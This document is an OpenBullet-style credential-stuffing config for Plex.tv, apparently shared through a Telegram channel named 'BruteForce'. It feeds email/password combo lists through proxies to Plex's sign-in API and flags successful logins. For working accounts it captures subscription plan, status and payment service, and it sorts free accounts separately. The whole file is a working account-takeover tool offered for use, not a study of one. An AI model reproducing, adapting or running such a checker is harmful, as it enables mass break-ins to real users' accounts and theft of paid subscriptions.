[SETTINGS]
{
  "Name": "PlexTV",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-13T17:52:32.376454+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce |Capture | HighCPM | Move Free Account To custom | CPM Rate: 200-1000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
var g1 = uuidv4();
END SCRIPT -> VARS "guid"

#Gets REQUEST POST "https://plex.tv/api/v2/users/signin?X-Plex-Product=Plex%20SSO&X-Plex-Client-Identifier=<guid>" 
  CONTENT "login=<USER>&password=<PASS>&rememberMe=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: fa,en-US;q=0.9,en;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 71" 
  HEADER "Host: plex.tv" 
  HEADER "Origin: https://app.plex.tv" 
  HEADER "Referer: https://app.plex.tv/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "User could not be authenticated" 
  KEYCHAIN Success OR 
    KEY "authToken" 

#active PARSE "<SOURCE>" JSON "active" CreateEmpty=FALSE -> CAP "active" 

#subscribedAt PARSE "<SOURCE>" JSON "subscribedAt" CreateEmpty=FALSE -> CAP "subscribedAt" 

#status PARSE "<SOURCE>" JSON "status" CreateEmpty=FALSE -> CAP "status" 

#paymentService PARSE "<SOURCE>" JSON "paymentService" CreateEmpty=FALSE -> CAP "paymentService" 

#plan PARSE "<SOURCE>" JSON "plan" CreateEmpty=FALSE -> CAP "plan" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "active\":false" 

#CC FUNCTION Constant " T.me/BruteForce " -> CAP "Telegram Channel:" 
